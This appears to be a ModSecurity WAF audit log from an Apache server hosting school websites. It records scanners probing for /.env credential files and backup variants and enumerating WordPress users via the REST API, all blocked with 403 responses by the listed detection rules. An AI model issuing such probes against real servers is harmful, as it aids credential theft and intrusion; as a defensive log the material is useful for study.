Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941979571050 1005 (- - -) Stopwatch2: 1749941979571050 1005; combined=390, p1=350, p2=0, p3=0, p4=0, p5=40, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a76d8440-Z-- --7097725c-A-- [15/Jun/2025:06:32:30 +0700] aE4GjvGguMGNwgSGIMwhuQAAAAI 103.236.140.4 55502 103.236.140.4 8181 --7097725c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.61.64.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.61.64.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7097725c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7097725c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749943950005516 2629 (- - -) Stopwatch2: 1749943950005516 2629; combined=1162, p1=377, p2=759, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7097725c-Z-- --6b423a18-A-- [15/Jun/2025:07:12:00 +0700] aE4P0Lr7GPil_2h-MzYIEAAAAM8 103.236.140.4 33618 103.236.140.4 8181 --6b423a18-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180413635 --6b423a18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6b423a18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946320338888 610 (- - -) Stopwatch2: 1749946320338888 610; combined=205, p1=182, p2=0, p3=0, p4=0, p5=23, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b423a18-Z-- --1281d63a-A-- [15/Jun/2025:07:12:00 +0700] aE4P0D2YoubFl106kA3T0gAAAIs 103.236.140.4 33626 103.236.140.4 8181 --1281d63a-B-- GET /.env.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180494943 --1281d63a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1281d63a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946320667258 842 (- - -) Stopwatch2: 1749946320667258 842; combined=344, p1=306, p2=0, p3=0, p4=0, p5=38, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1281d63a-Z-- --398cf477-A-- [15/Jun/2025:07:12:00 +0700] aE4P0Lr7GPil_2h-MzYIEQAAANM 103.236.140.4 33630 103.236.140.4 8181 --398cf477-B-- GET /.env.example HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180413638 --398cf477-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --398cf477-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946320850614 672 (- - -) Stopwatch2: 1749946320850614 672; combined=255, p1=223, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --398cf477-Z-- --f6cfa652-A-- [15/Jun/2025:07:12:01 +0700] aE4P0br7GPil_2h-MzYIEgAAANE 103.236.140.4 33634 103.236.140.4 8181 --f6cfa652-B-- GET /.env.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180494946 --f6cfa652-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f6cfa652-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946321073242 681 (- - -) Stopwatch2: 1749946321073242 681; combined=255, p1=223, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6cfa652-Z-- --c136102c-A-- [15/Jun/2025:07:12:01 +0700] aE4P0fGguMGNwgSGIMwjIQAAAAo 103.236.140.4 33638 103.236.140.4 8181 --c136102c-B-- GET /.env.old HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180413641 --c136102c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c136102c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946321282042 696 (- - -) Stopwatch2: 1749946321282042 696; combined=279, p1=245, p2=0, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c136102c-Z-- --57ac8e0c-A-- [15/Jun/2025:07:12:01 +0700] aE4P0YZIfYpKBvn-jB7J6AAAAFc 103.236.140.4 33642 103.236.140.4 8181 --57ac8e0c-B-- GET /.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180494949 --57ac8e0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --57ac8e0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946321453107 759 (- - -) Stopwatch2: 1749946321453107 759; combined=335, p1=301, p2=0, p3=0, p4=0, p5=34, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57ac8e0c-Z-- --4626f437-A-- [15/Jun/2025:07:12:02 +0700] aE4P0vGguMGNwgSGIMwjJAAAABI 103.236.140.4 33646 103.236.140.4 8181 --4626f437-B-- GET /app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180413647 --4626f437-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4626f437-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946322013846 739 (- - -) Stopwatch2: 1749946322013846 739; combined=269, p1=246, p2=0, p3=0, p4=0, p5=23, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4626f437-Z-- --47c03d35-A-- [15/Jun/2025:07:12:03 +0700] aE4P0_GguMGNwgSGIMwjLgAAAAM 103.236.140.4 33654 103.236.140.4 8181 --47c03d35-B-- GET /laravel/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180413662 --47c03d35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --47c03d35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946323864269 790 (- - -) Stopwatch2: 1749946323864269 790; combined=333, p1=300, p2=0, p3=0, p4=0, p5=33, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47c03d35-Z-- --b446d409-A-- [15/Jun/2025:07:24:45 +0700] aE4SzYZIfYpKBvn-jB7J7AAAAEQ 103.236.140.4 33698 103.236.140.4 8181 --b446d409-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.159.85.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.159.85.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b446d409-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b446d409-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749947085920310 3409 (- - -) Stopwatch2: 1749947085920310 3409; combined=1444, p1=487, p2=925, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b446d409-Z-- --8139e853-A-- [15/Jun/2025:07:37:28 +0700] aE4VyPGguMGNwgSGIMwjNQAAAA4 103.236.140.4 33734 103.236.140.4 8181 --8139e853-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G930V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --8139e853-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8139e853-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749947848845357 919 (- - -) Stopwatch2: 1749947848845357 919; combined=391, p1=355, p2=0, p3=0, p4=0, p5=36, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8139e853-Z-- --e6273248-A-- [15/Jun/2025:07:37:35 +0700] aE4Vzz2YoubFl106kA3T2wAAAIU 103.236.140.4 33736 103.236.140.4 8181 --e6273248-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) Accept-Charset: utf-8 --e6273248-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6273248-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749947855860732 773 (- - -) Stopwatch2: 1749947855860732 773; combined=321, p1=285, p2=0, p3=0, p4=0, p5=35, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6273248-Z-- --aee1d303-A-- [15/Jun/2025:08:17:45 +0700] aE4fOfGguMGNwgSGIMwjPQAAAAM 103.236.140.4 33866 103.236.140.4 8181 --aee1d303-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.199.85.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.199.85.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aee1d303-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aee1d303-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749950265042215 3642 (- - -) Stopwatch2: 1749950265042215 3642; combined=1544, p1=517, p2=995, p3=0, p4=0, p5=32, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aee1d303-Z-- --b7407c59-A-- [15/Jun/2025:09:39:39 +0700] aE4yaz2YoubFl106kA3T_gAAAIw 103.236.140.4 34120 103.236.140.4 8181 --b7407c59-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.130.25.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.130.25.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b7407c59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7407c59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749955179705248 3336 (- - -) Stopwatch2: 1749955179705248 3336; combined=1425, p1=486, p2=906, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7407c59-Z-- --ebe0b215-A-- [15/Jun/2025:10:51:53 +0700] aE5DWbr7GPil_2h-MzYIWAAAAMM 103.236.140.4 34804 103.236.140.4 8181 --ebe0b215-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.134 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.134 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --ebe0b215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebe0b215-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749959513491275 869 (- - -) Stopwatch2: 1749959513491275 869; combined=366, p1=328, p2=0, p3=0, p4=0, p5=38, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebe0b215-Z-- --2346a77a-A-- [15/Jun/2025:10:51:54 +0700] aE5DWrr7GPil_2h-MzYIWQAAAMY 103.236.140.4 34806 103.236.140.4 8181 --2346a77a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.134 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.134 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --2346a77a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2346a77a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749959514989971 652 (- - -) Stopwatch2: 1749959514989971 652; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2346a77a-Z-- --ce219c74-A-- [15/Jun/2025:11:03:19 +0700] aE5GB_GguMGNwgSGIMwjmQAAAAE 103.236.140.4 34872 103.236.140.4 8181 --ce219c74-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 34.151.206.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 34.151.206.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ce219c74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce219c74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749960199391991 3012 (- - -) Stopwatch2: 1749960199391991 3012; combined=1295, p1=436, p2=829, p3=0, p4=0, p5=30, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce219c74-Z-- --21951a1d-A-- [15/Jun/2025:11:36:45 +0700] aE5N3T2YoubFl106kA3ULwAAAI0 103.236.140.4 35182 103.236.140.4 8181 --21951a1d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.18.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.18.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --21951a1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21951a1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749962205961687 840 (- - -) Stopwatch2: 1749962205961687 840; combined=352, p1=298, p2=0, p3=0, p4=0, p5=54, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
